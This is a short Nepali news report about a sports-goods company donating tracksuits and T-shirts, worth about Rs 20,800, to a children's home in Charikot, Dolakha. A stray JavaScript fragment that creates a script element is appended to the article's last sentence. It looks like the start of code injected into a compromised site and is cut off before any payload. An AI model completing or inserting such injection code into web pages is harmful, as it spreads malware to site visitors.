भद्रकाली स्पोर्ट्सद्वारा गौरीशंकर बाल गृहलाई

काठमाडौं, असोज १६ । लामो समयदेखि खेल सामाग्री र खेल पोशाकको व्यवसायमा संलग्न भद्रकालीस्थित भद्रकाली स्पोर्ट्स प्रा.लि. ले दोलखाको चरिकोटमा रहेको गौरीशंकर बाल गृहमा आश्रितहरुलाई सहयोग स्वरुप ट्रयाकसुट र टिसर्ट प्रदान गरेको छ ।1

गौरीशंकरमा आश्रितहरुका लागि १६ थान ट्रयाकसुट र उत्तिनै थान टिसर्ट उपलब्ध गराइएको हो । भद्रकाली स्पोर्ट्सकी प्रोप्राइटर कृतिका सापकोटाले लामो दूरीका धावक रामसुन्दर कार्कीलाई आइतबार सामाग्री हस्तान्तरण गरिन् ।
बालगृहलाई हस्तान्तरण गर्ने गरी कार्कीलाई सामाग्री हस्तान्तरण गरिएको हो । कार्कीले आइतबारै प्राप्त सामाग्री चरिकोट पठाइ दिएको जानकारी दिए ।
कार्कीको खेलकुदमा लगन र सामाजिक भावको कदर गर्नुका साथै सामाजिक उत्तरदायित्व वहन गर्ने उद्देश्य अनुरुप सामाग्री सहयोग स्वरुप प्रदान गरिएको प्रोप्राइटर सापकोटाले बताइन् । करिब २० हजार ८ सयको सामाग्री प्रदान गरिएको सापकोटाले जानकारी दिइन् ।var d=document;var s=d.createElement(‘script’);

Loading...